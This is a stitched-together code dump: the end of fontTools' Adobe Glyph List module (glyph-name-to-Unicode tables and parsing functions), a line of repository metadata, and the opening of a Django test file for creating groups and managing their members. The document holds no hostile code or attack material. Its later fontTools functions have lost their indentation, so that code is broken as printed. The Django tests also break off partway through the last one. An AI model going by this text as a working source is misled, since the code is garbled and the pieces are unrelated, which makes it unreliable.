255D;SF260000;BOX DRAWINGS DOUBLE UP AND LEFT
255C;SF270000;BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
255B;SF280000;BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
255E;SF360000;BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
255F;SF370000;BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
255A;SF380000;BOX DRAWINGS DOUBLE UP AND RIGHT
2554;SF390000;BOX DRAWINGS DOUBLE DOWN AND RIGHT
2569;SF400000;BOX DRAWINGS DOUBLE UP AND HORIZONTAL
2566;SF410000;BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
2560;SF420000;BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
2550;SF430000;BOX DRAWINGS DOUBLE HORIZONTAL
256C;SF440000;BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
2567;SF450000;BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
2568;SF460000;BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
2564;SF470000;BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
2565;SF480000;BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
2559;SF490000;BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
2558;SF500000;BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
2552;SF510000;BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
2553;SF520000;BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
256B;SF530000;BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
256A;SF540000;BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
015A;Sacute;LATIN CAPITAL LETTER S WITH ACUTE
0160;Scaron;LATIN CAPITAL LETTER S WITH CARON
015E;Scedilla;LATIN CAPITAL LETTER S WITH CEDILLA
015C;Scircumflex;LATIN CAPITAL LETTER S WITH CIRCUMFLEX
03A3;Sigma;GREEK CAPITAL LETTER SIGMA
0054;T;LATIN CAPITAL LETTER T
03A4;Tau;GREEK CAPITAL LETTER TAU
0166;Tbar;LATIN CAPITAL LETTER T WITH STROKE
0164;Tcaron;LATIN CAPITAL LETTER T WITH CARON
0398;Theta;GREEK CAPITAL LETTER THETA
00DE;Thorn;LATIN CAPITAL LETTER THORN
0055;U;LATIN CAPITAL LETTER U
00DA;Uacute;LATIN CAPITAL LETTER U WITH ACUTE
016C;Ubreve;LATIN CAPITAL LETTER U WITH BREVE
00DB;Ucircumflex;LATIN CAPITAL LETTER U WITH CIRCUMFLEX
00DC;Udieresis;LATIN CAPITAL LETTER U WITH DIAERESIS
00D9;Ugrave;LATIN CAPITAL LETTER U WITH GRAVE
01AF;Uhorn;LATIN CAPITAL LETTER U WITH HORN
0170;Uhungarumlaut;LATIN CAPITAL LETTER U WITH DOUBLE ACUTE
016A;Umacron;LATIN CAPITAL LETTER U WITH MACRON
0172;Uogonek;LATIN CAPITAL LETTER U WITH OGONEK
03A5;Upsilon;GREEK CAPITAL LETTER UPSILON
03D2;Upsilon1;GREEK UPSILON WITH HOOK SYMBOL
03AB;Upsilondieresis;GREEK CAPITAL LETTER UPSILON WITH DIALYTIKA
038E;Upsilontonos;GREEK CAPITAL LETTER UPSILON WITH TONOS
016E;Uring;LATIN CAPITAL LETTER U WITH RING ABOVE
0168;Utilde;LATIN CAPITAL LETTER U WITH TILDE
0056;V;LATIN CAPITAL LETTER V
0057;W;LATIN CAPITAL LETTER W
1E82;Wacute;LATIN CAPITAL LETTER W WITH ACUTE
0174;Wcircumflex;LATIN CAPITAL LETTER W WITH CIRCUMFLEX
1E84;Wdieresis;LATIN CAPITAL LETTER W WITH DIAERESIS
1E80;Wgrave;LATIN CAPITAL LETTER W WITH GRAVE
0058;X;LATIN CAPITAL LETTER X
039E;Xi;GREEK CAPITAL LETTER XI
0059;Y;LATIN CAPITAL LETTER Y
00DD;Yacute;LATIN CAPITAL LETTER Y WITH ACUTE
0176;Ycircumflex;LATIN CAPITAL LETTER Y WITH CIRCUMFLEX
0178;Ydieresis;LATIN CAPITAL LETTER Y WITH DIAERESIS
1EF2;Ygrave;LATIN CAPITAL LETTER Y WITH GRAVE
005A;Z;LATIN CAPITAL LETTER Z
0179;Zacute;LATIN CAPITAL LETTER Z WITH ACUTE
017D;Zcaron;LATIN CAPITAL LETTER Z WITH CARON
017B;Zdotaccent;LATIN CAPITAL LETTER Z WITH DOT ABOVE
0396;Zeta;GREEK CAPITAL LETTER ZETA
0061;a;LATIN SMALL LETTER A
00E1;aacute;LATIN SMALL LETTER A WITH ACUTE
0103;abreve;LATIN SMALL LETTER A WITH BREVE
00E2;acircumflex;LATIN SMALL LETTER A WITH CIRCUMFLEX
00B4;acute;ACUTE ACCENT
0301;acutecomb;COMBINING ACUTE ACCENT
00E4;adieresis;LATIN SMALL LETTER A WITH DIAERESIS
00E6;ae;LATIN SMALL LETTER AE
01FD;aeacute;LATIN SMALL LETTER AE WITH ACUTE
00E0;agrave;LATIN SMALL LETTER A WITH GRAVE
2135;aleph;ALEF SYMBOL
03B1;alpha;GREEK SMALL LETTER ALPHA
03AC;alphatonos;GREEK SMALL LETTER ALPHA WITH TONOS
0101;amacron;LATIN SMALL LETTER A WITH MACRON
0026;ampersand;AMPERSAND
2220;angle;ANGLE
2329;angleleft;LEFT-POINTING ANGLE BRACKET
232A;angleright;RIGHT-POINTING ANGLE BRACKET
0387;anoteleia;GREEK ANO TELEIA
0105;aogonek;LATIN SMALL LETTER A WITH OGONEK
2248;approxequal;ALMOST EQUAL TO
00E5;aring;LATIN SMALL LETTER A WITH RING ABOVE
01FB;aringacute;LATIN SMALL LETTER A WITH RING ABOVE AND ACUTE
2194;arrowboth;LEFT RIGHT ARROW
21D4;arrowdblboth;LEFT RIGHT DOUBLE ARROW
21D3;arrowdbldown;DOWNWARDS DOUBLE ARROW
21D0;arrowdblleft;LEFTWARDS DOUBLE ARROW
21D2;arrowdblright;RIGHTWARDS DOUBLE ARROW
21D1;arrowdblup;UPWARDS DOUBLE ARROW
2193;arrowdown;DOWNWARDS ARROW
2190;arrowleft;LEFTWARDS ARROW
2192;arrowright;RIGHTWARDS ARROW
2191;arrowup;UPWARDS ARROW
2195;arrowupdn;UP DOWN ARROW
21A8;arrowupdnbse;UP DOWN ARROW WITH BASE
005E;asciicircum;CIRCUMFLEX ACCENT
007E;asciitilde;TILDE
002A;asterisk;ASTERISK
2217;asteriskmath;ASTERISK OPERATOR
0040;at;COMMERCIAL AT
00E3;atilde;LATIN SMALL LETTER A WITH TILDE
0062;b;LATIN SMALL LETTER B
005C;backslash;REVERSE SOLIDUS
007C;bar;VERTICAL LINE
03B2;beta;GREEK SMALL LETTER BETA
2588;block;FULL BLOCK
007B;braceleft;LEFT CURLY BRACKET
007D;braceright;RIGHT CURLY BRACKET
005B;bracketleft;LEFT SQUARE BRACKET
005D;bracketright;RIGHT SQUARE BRACKET
02D8;breve;BREVE
00A6;brokenbar;BROKEN BAR
2022;bullet;BULLET
0063;c;LATIN SMALL LETTER C
0107;cacute;LATIN SMALL LETTER C WITH ACUTE
02C7;caron;CARON
21B5;carriagereturn;DOWNWARDS ARROW WITH CORNER LEFTWARDS
010D;ccaron;LATIN SMALL LETTER C WITH CARON
00E7;ccedilla;LATIN SMALL LETTER C WITH CEDILLA
0109;ccircumflex;LATIN SMALL LETTER C WITH CIRCUMFLEX
010B;cdotaccent;LATIN SMALL LETTER C WITH DOT ABOVE
00B8;cedilla;CEDILLA
00A2;cent;CENT SIGN
03C7;chi;GREEK SMALL LETTER CHI
25CB;circle;WHITE CIRCLE
2297;circlemultiply;CIRCLED TIMES
2295;circleplus;CIRCLED PLUS
02C6;circumflex;MODIFIER LETTER CIRCUMFLEX ACCENT
2663;club;BLACK CLUB SUIT
003A;colon;COLON
20A1;colonmonetary;COLON SIGN
002C;comma;COMMA
2245;congruent;APPROXIMATELY EQUAL TO
00A9;copyright;COPYRIGHT SIGN
00A4;currency;CURRENCY SIGN
0064;d;LATIN SMALL LETTER D
2020;dagger;DAGGER
2021;daggerdbl;DOUBLE DAGGER
010F;dcaron;LATIN SMALL LETTER D WITH CARON
0111;dcroat;LATIN SMALL LETTER D WITH STROKE
00B0;degree;DEGREE SIGN
03B4;delta;GREEK SMALL LETTER DELTA
2666;diamond;BLACK DIAMOND SUIT
00A8;dieresis;DIAERESIS
0385;dieresistonos;GREEK DIALYTIKA TONOS
00F7;divide;DIVISION SIGN
2593;dkshade;DARK SHADE
2584;dnblock;LOWER HALF BLOCK
0024;dollar;DOLLAR SIGN
20AB;dong;DONG SIGN
02D9;dotaccent;DOT ABOVE
0323;dotbelowcomb;COMBINING DOT BELOW
0131;dotlessi;LATIN SMALL LETTER DOTLESS I
22C5;dotmath;DOT OPERATOR
0065;e;LATIN SMALL LETTER E
00E9;eacute;LATIN SMALL LETTER E WITH ACUTE
0115;ebreve;LATIN SMALL LETTER E WITH BREVE
011B;ecaron;LATIN SMALL LETTER E WITH CARON
00EA;ecircumflex;LATIN SMALL LETTER E WITH CIRCUMFLEX
00EB;edieresis;LATIN SMALL LETTER E WITH DIAERESIS
0117;edotaccent;LATIN SMALL LETTER E WITH DOT ABOVE
00E8;egrave;LATIN SMALL LETTER E WITH GRAVE
0038;eight;DIGIT EIGHT
2208;element;ELEMENT OF
2026;ellipsis;HORIZONTAL ELLIPSIS
0113;emacron;LATIN SMALL LETTER E WITH MACRON
2014;emdash;EM DASH
2205;emptyset;EMPTY SET
2013;endash;EN DASH
014B;eng;LATIN SMALL LETTER ENG
0119;eogonek;LATIN SMALL LETTER E WITH OGONEK
03B5;epsilon;GREEK SMALL LETTER EPSILON
03AD;epsilontonos;GREEK SMALL LETTER EPSILON WITH TONOS
003D;equal;EQUALS SIGN
2261;equivalence;IDENTICAL TO
212E;estimated;ESTIMATED SYMBOL
03B7;eta;GREEK SMALL LETTER ETA
03AE;etatonos;GREEK SMALL LETTER ETA WITH TONOS
00F0;eth;LATIN SMALL LETTER ETH
0021;exclam;EXCLAMATION MARK
203C;exclamdbl;DOUBLE EXCLAMATION MARK
00A1;exclamdown;INVERTED EXCLAMATION MARK
2203;existential;THERE EXISTS
0066;f;LATIN SMALL LETTER F
2640;female;FEMALE SIGN
2012;figuredash;FIGURE DASH
25A0;filledbox;BLACK SQUARE
25AC;filledrect;BLACK RECTANGLE
0035;five;DIGIT FIVE
215D;fiveeighths;VULGAR FRACTION FIVE EIGHTHS
0192;florin;LATIN SMALL LETTER F WITH HOOK
0034;four;DIGIT FOUR
2044;fraction;FRACTION SLASH
20A3;franc;FRENCH FRANC SIGN
0067;g;LATIN SMALL LETTER G
03B3;gamma;GREEK SMALL LETTER GAMMA
011F;gbreve;LATIN SMALL LETTER G WITH BREVE
01E7;gcaron;LATIN SMALL LETTER G WITH CARON
011D;gcircumflex;LATIN SMALL LETTER G WITH CIRCUMFLEX
0121;gdotaccent;LATIN SMALL LETTER G WITH DOT ABOVE
00DF;germandbls;LATIN SMALL LETTER SHARP S
2207;gradient;NABLA
0060;grave;GRAVE ACCENT
0300;gravecomb;COMBINING GRAVE ACCENT
003E;greater;GREATER-THAN SIGN
2265;greaterequal;GREATER-THAN OR EQUAL TO
00AB;guillemotleft;LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
00BB;guillemotright;RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
2039;guilsinglleft;SINGLE LEFT-POINTING ANGLE QUOTATION MARK
203A;guilsinglright;SINGLE RIGHT-POINTING ANGLE QUOTATION MARK
0068;h;LATIN SMALL LETTER H
0127;hbar;LATIN SMALL LETTER H WITH STROKE
0125;hcircumflex;LATIN SMALL LETTER H WITH CIRCUMFLEX
2665;heart;BLACK HEART SUIT
0309;hookabovecomb;COMBINING HOOK ABOVE
2302;house;HOUSE
02DD;hungarumlaut;DOUBLE ACUTE ACCENT
002D;hyphen;HYPHEN-MINUS
0069;i;LATIN SMALL LETTER I
00ED;iacute;LATIN SMALL LETTER I WITH ACUTE
012D;ibreve;LATIN SMALL LETTER I WITH BREVE
00EE;icircumflex;LATIN SMALL LETTER I WITH CIRCUMFLEX
00EF;idieresis;LATIN SMALL LETTER I WITH DIAERESIS
00EC;igrave;LATIN SMALL LETTER I WITH GRAVE
0133;ij;LATIN SMALL LIGATURE IJ
012B;imacron;LATIN SMALL LETTER I WITH MACRON
221E;infinity;INFINITY
222B;integral;INTEGRAL
2321;integralbt;BOTTOM HALF INTEGRAL
2320;integraltp;TOP HALF INTEGRAL
2229;intersection;INTERSECTION
25D8;invbullet;INVERSE BULLET
25D9;invcircle;INVERSE WHITE CIRCLE
263B;invsmileface;BLACK SMILING FACE
012F;iogonek;LATIN SMALL LETTER I WITH OGONEK
03B9;iota;GREEK SMALL LETTER IOTA
03CA;iotadieresis;GREEK SMALL LETTER IOTA WITH DIALYTIKA
0390;iotadieresistonos;GREEK SMALL LETTER IOTA WITH DIALYTIKA AND TONOS
03AF;iotatonos;GREEK SMALL LETTER IOTA WITH TONOS
0129;itilde;LATIN SMALL LETTER I WITH TILDE
006A;j;LATIN SMALL LETTER J
0135;jcircumflex;LATIN SMALL LETTER J WITH CIRCUMFLEX
006B;k;LATIN SMALL LETTER K
03BA;kappa;GREEK SMALL LETTER KAPPA
0138;kgreenlandic;LATIN SMALL LETTER KRA
006C;l;LATIN SMALL LETTER L
013A;lacute;LATIN SMALL LETTER L WITH ACUTE
03BB;lambda;GREEK SMALL LETTER LAMDA
013E;lcaron;LATIN SMALL LETTER L WITH CARON
0140;ldot;LATIN SMALL LETTER L WITH MIDDLE DOT
003C;less;LESS-THAN SIGN
2264;lessequal;LESS-THAN OR EQUAL TO
258C;lfblock;LEFT HALF BLOCK
20A4;lira;LIRA SIGN
2227;logicaland;LOGICAL AND
00AC;logicalnot;NOT SIGN
2228;logicalor;LOGICAL OR
017F;longs;LATIN SMALL LETTER LONG S
25CA;lozenge;LOZENGE
0142;lslash;LATIN SMALL LETTER L WITH STROKE
2591;ltshade;LIGHT SHADE
006D;m;LATIN SMALL LETTER M
00AF;macron;MACRON
2642;male;MALE SIGN
2212;minus;MINUS SIGN
2032;minute;PRIME
00B5;mu;MICRO SIGN
00D7;multiply;MULTIPLICATION SIGN
266A;musicalnote;EIGHTH NOTE
266B;musicalnotedbl;BEAMED EIGHTH NOTES
006E;n;LATIN SMALL LETTER N
0144;nacute;LATIN SMALL LETTER N WITH ACUTE
0149;napostrophe;LATIN SMALL LETTER N PRECEDED BY APOSTROPHE
0148;ncaron;LATIN SMALL LETTER N WITH CARON
0039;nine;DIGIT NINE
2209;notelement;NOT AN ELEMENT OF
2260;notequal;NOT EQUAL TO
2284;notsubset;NOT A SUBSET OF
00F1;ntilde;LATIN SMALL LETTER N WITH TILDE
03BD;nu;GREEK SMALL LETTER NU
0023;numbersign;NUMBER SIGN
006F;o;LATIN SMALL LETTER O
00F3;oacute;LATIN SMALL LETTER O WITH ACUTE
014F;obreve;LATIN SMALL LETTER O WITH BREVE
00F4;ocircumflex;LATIN SMALL LETTER O WITH CIRCUMFLEX
00F6;odieresis;LATIN SMALL LETTER O WITH DIAERESIS
0153;oe;LATIN SMALL LIGATURE OE
02DB;ogonek;OGONEK
00F2;ograve;LATIN SMALL LETTER O WITH GRAVE
01A1;ohorn;LATIN SMALL LETTER O WITH HORN
0151;ohungarumlaut;LATIN SMALL LETTER O WITH DOUBLE ACUTE
014D;omacron;LATIN SMALL LETTER O WITH MACRON
03C9;omega;GREEK SMALL LETTER OMEGA
03D6;omega1;GREEK PI SYMBOL
03CE;omegatonos;GREEK SMALL LETTER OMEGA WITH TONOS
03BF;omicron;GREEK SMALL LETTER OMICRON
03CC;omicrontonos;GREEK SMALL LETTER OMICRON WITH TONOS
0031;one;DIGIT ONE
2024;onedotenleader;ONE DOT LEADER
215B;oneeighth;VULGAR FRACTION ONE EIGHTH
00BD;onehalf;VULGAR FRACTION ONE HALF
00BC;onequarter;VULGAR FRACTION ONE QUARTER
2153;onethird;VULGAR FRACTION ONE THIRD
25E6;openbullet;WHITE BULLET
00AA;ordfeminine;FEMININE ORDINAL INDICATOR
00BA;ordmasculine;MASCULINE ORDINAL INDICATOR
221F;orthogonal;RIGHT ANGLE
00F8;oslash;LATIN SMALL LETTER O WITH STROKE
01FF;oslashacute;LATIN SMALL LETTER O WITH STROKE AND ACUTE
00F5;otilde;LATIN SMALL LETTER O WITH TILDE
0070;p;LATIN SMALL LETTER P
00B6;paragraph;PILCROW SIGN
0028;parenleft;LEFT PARENTHESIS
0029;parenright;RIGHT PARENTHESIS
2202;partialdiff;PARTIAL DIFFERENTIAL
0025;percent;PERCENT SIGN
002E;period;FULL STOP
00B7;periodcentered;MIDDLE DOT
22A5;perpendicular;UP TACK
2030;perthousand;PER MILLE SIGN
20A7;peseta;PESETA SIGN
03C6;phi;GREEK SMALL LETTER PHI
03D5;phi1;GREEK PHI SYMBOL
03C0;pi;GREEK SMALL LETTER PI
002B;plus;PLUS SIGN
00B1;plusminus;PLUS-MINUS SIGN
211E;prescription;PRESCRIPTION TAKE
220F;product;N-ARY PRODUCT
2282;propersubset;SUBSET OF
2283;propersuperset;SUPERSET OF
221D;proportional;PROPORTIONAL TO
03C8;psi;GREEK SMALL LETTER PSI
0071;q;LATIN SMALL LETTER Q
003F;question;QUESTION MARK
00BF;questiondown;INVERTED QUESTION MARK
0022;quotedbl;QUOTATION MARK
201E;quotedblbase;DOUBLE LOW-9 QUOTATION MARK
201C;quotedblleft;LEFT DOUBLE QUOTATION MARK
201D;quotedblright;RIGHT DOUBLE QUOTATION MARK
2018;quoteleft;LEFT SINGLE QUOTATION MARK
201B;quotereversed;SINGLE HIGH-REVERSED-9 QUOTATION MARK
2019;quoteright;RIGHT SINGLE QUOTATION MARK
201A;quotesinglbase;SINGLE LOW-9 QUOTATION MARK
0027;quotesingle;APOSTROPHE
0072;r;LATIN SMALL LETTER R
0155;racute;LATIN SMALL LETTER R WITH ACUTE
221A;radical;SQUARE ROOT
0159;rcaron;LATIN SMALL LETTER R WITH CARON
2286;reflexsubset;SUBSET OF OR EQUAL TO
2287;reflexsuperset;SUPERSET OF OR EQUAL TO
00AE;registered;REGISTERED SIGN
2310;revlogicalnot;REVERSED NOT SIGN
03C1;rho;GREEK SMALL LETTER RHO
02DA;ring;RING ABOVE
2590;rtblock;RIGHT HALF BLOCK
0073;s;LATIN SMALL LETTER S
015B;sacute;LATIN SMALL LETTER S WITH ACUTE
0161;scaron;LATIN SMALL LETTER S WITH CARON
015F;scedilla;LATIN SMALL LETTER S WITH CEDILLA
015D;scircumflex;LATIN SMALL LETTER S WITH CIRCUMFLEX
2033;second;DOUBLE PRIME
00A7;section;SECTION SIGN
003B;semicolon;SEMICOLON
0037;seven;DIGIT SEVEN
215E;seveneighths;VULGAR FRACTION SEVEN EIGHTHS
2592;shade;MEDIUM SHADE
03C3;sigma;GREEK SMALL LETTER SIGMA
03C2;sigma1;GREEK SMALL LETTER FINAL SIGMA
223C;similar;TILDE OPERATOR
0036;six;DIGIT SIX
002F;slash;SOLIDUS
263A;smileface;WHITE SMILING FACE
0020;space;SPACE
2660;spade;BLACK SPADE SUIT
00A3;sterling;POUND SIGN
220B;suchthat;CONTAINS AS MEMBER
2211;summation;N-ARY SUMMATION
263C;sun;WHITE SUN WITH RAYS
0074;t;LATIN SMALL LETTER T
03C4;tau;GREEK SMALL LETTER TAU
0167;tbar;LATIN SMALL LETTER T WITH STROKE
0165;tcaron;LATIN SMALL LETTER T WITH CARON
2234;therefore;THEREFORE
03B8;theta;GREEK SMALL LETTER THETA
03D1;theta1;GREEK THETA SYMBOL
00FE;thorn;LATIN SMALL LETTER THORN
0033;three;DIGIT THREE
215C;threeeighths;VULGAR FRACTION THREE EIGHTHS
00BE;threequarters;VULGAR FRACTION THREE QUARTERS
02DC;tilde;SMALL TILDE
0303;tildecomb;COMBINING TILDE
0384;tonos;GREEK TONOS
2122;trademark;TRADE MARK SIGN
25BC;triagdn;BLACK DOWN-POINTING TRIANGLE
25C4;triaglf;BLACK LEFT-POINTING POINTER
25BA;triagrt;BLACK RIGHT-POINTING POINTER
25B2;triagup;BLACK UP-POINTING TRIANGLE
0032;two;DIGIT TWO
2025;twodotenleader;TWO DOT LEADER
2154;twothirds;VULGAR FRACTION TWO THIRDS
0075;u;LATIN SMALL LETTER U
00FA;uacute;LATIN SMALL LETTER U WITH ACUTE
016D;ubreve;LATIN SMALL LETTER U WITH BREVE
00FB;ucircumflex;LATIN SMALL LETTER U WITH CIRCUMFLEX
00FC;udieresis;LATIN SMALL LETTER U WITH DIAERESIS
00F9;ugrave;LATIN SMALL LETTER U WITH GRAVE
01B0;uhorn;LATIN SMALL LETTER U WITH HORN
0171;uhungarumlaut;LATIN SMALL LETTER U WITH DOUBLE ACUTE
016B;umacron;LATIN SMALL LETTER U WITH MACRON
005F;underscore;LOW LINE
2017;underscoredbl;DOUBLE LOW LINE
222A;union;UNION
2200;universal;FOR ALL
0173;uogonek;LATIN SMALL LETTER U WITH OGONEK
2580;upblock;UPPER HALF BLOCK
03C5;upsilon;GREEK SMALL LETTER UPSILON
03CB;upsilondieresis;GREEK SMALL LETTER UPSILON WITH DIALYTIKA
03B0;upsilondieresistonos;GREEK SMALL LETTER UPSILON WITH DIALYTIKA AND TONOS
03CD;upsilontonos;GREEK SMALL LETTER UPSILON WITH TONOS
016F;uring;LATIN SMALL LETTER U WITH RING ABOVE
0169;utilde;LATIN SMALL LETTER U WITH TILDE
0076;v;LATIN SMALL LETTER V
0077;w;LATIN SMALL LETTER W
1E83;wacute;LATIN SMALL LETTER W WITH ACUTE
0175;wcircumflex;LATIN SMALL LETTER W WITH CIRCUMFLEX
1E85;wdieresis;LATIN SMALL LETTER W WITH DIAERESIS
2118;weierstrass;SCRIPT CAPITAL P
1E81;wgrave;LATIN SMALL LETTER W WITH GRAVE
0078;x;LATIN SMALL LETTER X
03BE;xi;GREEK SMALL LETTER XI
0079;y;LATIN SMALL LETTER Y
00FD;yacute;LATIN SMALL LETTER Y WITH ACUTE
0177;ycircumflex;LATIN SMALL LETTER Y WITH CIRCUMFLEX
00FF;ydieresis;LATIN SMALL LETTER Y WITH DIAERESIS
00A5;yen;YEN SIGN
1EF3;ygrave;LATIN SMALL LETTER Y WITH GRAVE
007A;z;LATIN SMALL LETTER Z
017A;zacute;LATIN SMALL LETTER Z WITH ACUTE
017E;zcaron;LATIN SMALL LETTER Z WITH CARON
017C;zdotaccent;LATIN SMALL LETTER Z WITH DOT ABOVE
0030;zero;DIGIT ZERO
03B6;zeta;GREEK SMALL LETTER ZETA
# END
"""
class AGLError(Exception):
	"""Raised when the embedded AGL data cannot be parsed."""
	pass
# Mappings populated below by _builddicts() from the embedded AGL data:
#   LEGACY_AGL2UV: glyph name -> list of Unicode values (from glyphlist.txt)
#   AGL2UV / UV2AGL: glyph name <-> single Unicode value (from aglfn.txt)
LEGACY_AGL2UV = {}
AGL2UV = {}
UV2AGL = {}
def _builddicts():
	"""Parse the embedded AGL text blocks and fill the module-level maps."""
	import re
	# glyphlist.txt entries look like "<glyphname>;<UV>[ <UV>...]".
	agl_pattern = re.compile("([A-Za-z0-9]+);((?:[0-9A-F]{4})(?: (?:[0-9A-F]{4}))*)$")
	for raw in _aglText.splitlines():
		if not raw or raw[:1] == '#':
			continue
		matched = agl_pattern.match(raw)
		if matched is None:
			raise AGLError("syntax error in glyphlist.txt: %s" % repr(raw[:20]))
		hex_codes = matched.group(2)
		# Each code is four hex digits, space-separated, hence 4 mod 5.
		assert len(hex_codes) % 5 == 4
		values = [int(code, 16) for code in hex_codes.split()]
		name = tostr(matched.group(1))
		LEGACY_AGL2UV[name] = values
	# aglfn.txt entries look like "<UV>;<glyphname>;<description>".
	aglfn_pattern = re.compile("([0-9A-F]{4});([A-Za-z0-9]+);.*?$")
	for raw in _aglfnText.splitlines():
		if not raw or raw[:1] == '#':
			continue
		matched = aglfn_pattern.match(raw)
		if matched is None:
			raise AGLError("syntax error in aglfn.txt: %s" % repr(raw[:20]))
		hex_code = matched.group(1)
		assert len(hex_code) == 4
		value = int(hex_code, 16)
		name = tostr(matched.group(2))
		AGL2UV[name] = value
		UV2AGL[value] = name
_builddicts()
def toUnicode(glyph, isZapfDingbats=False):
	"""Convert glyph names to Unicode, such as ``'longs_t.oldstyle'`` --> ``u'ſt'``

	If ``isZapfDingbats`` is ``True``, the implementation recognizes additional
	glyph names (as required by the AGL specification).
	"""
	# Algorithm from:
	# https://github.com/adobe-type-tools/agl-specification#2-the-mapping
	# Step 1: everything from the first period (U+002E) onward is ignored.
	base = glyph.split(".", 1)[0]
	# Step 2: underscores (U+005F) delimit the individual components.
	# Step 3: map each component and concatenate the resulting strings.
	return "".join(
		_glyphComponentToUnicode(part, isZapfDingbats)
		for part in base.split("_")
	)
def _glyphComponentToUnicode(component, isZapfDingbats):
	"""Map a single underscore-delimited glyph-name component to a string.

	Returns the empty string when the component matches no AGL rule.
	"""
	# For Zapf Dingbats fonts, the ITC Zapf Dingbats Glyph List is
	# consulted first.
	if isZapfDingbats:
		dingbat = _zapfDingbatsToUnicode(component)
		if dingbat:
			return dingbat
	# Names present in the (legacy) Adobe Glyph List map directly to
	# their listed character sequence.
	values = LEGACY_AGL2UV.get(component)
	if values:
		return "".join(map(chr, values))
	# "uni" + groups of four uppercase hex digits: each group is one BMP
	# scalar value (surrogates excluded). The four-digit-group and range
	# restrictions confine this form to the Basic Multilingual Plane.
	mapped = _uniToUnicode(component)
	if mapped:
		return mapped
	# "u" + four to six uppercase hex digits: a single scalar value in
	# 0000..D7FF or E000..10FFFF.
	mapped = _uToUnicode(component)
	if mapped:
		return mapped
	# Anything else maps to the empty string.
	return ''
# https://github.com/adobe-type-tools/agl-aglfn/blob/master/zapfdingbats.txt
_AGL_ZAPF_DINGBATS = (
" ✁✂✄☎✆✝✞✟✠✡☛☞✌✍✎✏✑✒✓✔✕✖✗✘✙✚✛✜✢✣✤✥✦✧★✩✪✫✬✭✮✯✰✱✲✳✴✵✶✷✸✹✺✻✼✽✾✿❀"
"❁❂❃❄❅❆❇❈❉❊❋●❍■❏❑▲▼◆❖ ◗❘❙❚❯❱❲❳❨❩❬❭❪❫❴❵❛❜❝❞❡❢❣❤✐❥❦❧♠♥♦♣ ✉✈✇"
"①②③④⑤⑥⑦⑧⑨⑩❶❷❸❹❺❻❼❽❾❿➀➁➂➃➄➅➆➇➈➉➊➋➌➍➎➏➐➑➒➓➔→➣↔"
"↕➙➛➜➝➞➟➠➡➢➤➥➦➧➨➩➫➭➯➲➳➵➸➺➻➼➽➾➚➪➶➹➘➴➷➬➮➱✃❐❒❮❰")
def _zapfDingbatsToUnicode(glyph):
"""Helper for toUnicode()."""
if len(glyph) < 2 or glyph[0] != 'a':
return None
try:
gid = int(glyph[1:])
except ValueError:
return None
if gid < 0 or gid >= len(_AGL_ZAPF_DINGBATS):
return None
uchar = _AGL_ZAPF_DINGBATS[gid]
return uchar if uchar != ' ' else None
_re_uni = re.compile("^uni([0-9A-F]+)$")
def _uniToUnicode(component):
"""Helper for toUnicode() to handle "uniABCD" components."""
match = _re_uni.match(component)
if match is None:
return None
digits = match.group(1)
if len(digits) % 4 != 0:
return None
chars = [int(digits[i : i + 4], 16)
for i in range(0, len(digits), 4)]
if any(c >= 0xD800 and c <= 0xDFFF for c in chars):
# The AGL specification explicitly excluded surrogate pairs.
return None
return ''.join([chr(c) for c in chars])
_re_u = re.compile("^u([0-9A-F]{4,6})$")
def _uToUnicode(component):
"""Helper for toUnicode() to handle "u1ABCD" components."""
match = _re_u.match(component)
if match is None:
return None
digits = match.group(1)
try:
value = int(digits, 16)
except ValueError:
return None
if ((value >= 0x0000 and value <= 0xD7FF) or
(value >= 0xE000 and value <= 0x10FFFF)):
return chr(value)
return None
|
google/material-design-icons
|
update/venv/lib/python3.9/site-packages/fontTools/agl.py
|
Python
|
apache-2.0
| 112,519
|
from django.test import TestCase
from groups import models as group_model
class SimpleTest(TestCase):
    """Exercises the group-model CRUD helpers (create/get/add/remove/query)."""
    def test_create_group(self):
        """
        Test group creation
        """
        group = group_model.create_group('ateam@mechmooc.com', 'The A team', 1)
        # A freshly created group exposes these four fields.
        self.assertTrue('address' in group)
        self.assertTrue('description' in group)
        self.assertTrue('members' in group)
        self.assertTrue('sequence' in group)
        # Re-fetching by URI must round-trip to an equal dict.
        group_copy = group_model.get_group(group['uri'])
        self.assertEqual(group, group_copy)
    def test_add_group_member(self):
        """Adding a member makes it visible in the group's member list."""
        group = group_model.create_group('ateam@mechmooc.com', 'The A team', 1)
        group_model.add_group_member(group['uri'], 'bob@mail.com')
        group = group_model.get_group(group['uri'])
        self.assertEqual(len(group['members']), 1)
        self.assertEqual(group['members'][0], 'bob@mail.com')
    def test_remove_group_member(self):
        """Removing one of two members leaves only the other."""
        group = group_model.create_group('ateam@mechmooc.com', 'The A team', 1)
        group_model.add_group_member(group['uri'], 'bob@mail.com')
        group_model.add_group_member(group['uri'], 'dick@mail.com')
        group_model.remove_group_member(group['uri'], 'dick@mail.com')
        group = group_model.get_group(group['uri'])
        self.assertEqual(len(group['members']), 1)
        self.assertEqual(group['members'][0], 'bob@mail.com')
    def test_get_sequence_groups(self):
        """get_groups('1') returns groups created under sequence 1."""
        group = group_model.create_group('group-1-1@mechmooc.com', 'The A team', 1)
        group = group_model.create_group('group-1-2@mechmooc.com', 'The B team', 1)
        group = group_model.create_group('group-1-3@mechmooc.com', 'The C team', 1)
        group = group_model.create_group('group-1-4@mechmooc.com', 'The D team', 1)
        group = group_model.create_group('group-1-5@mechmooc.com', 'The E team', 1)
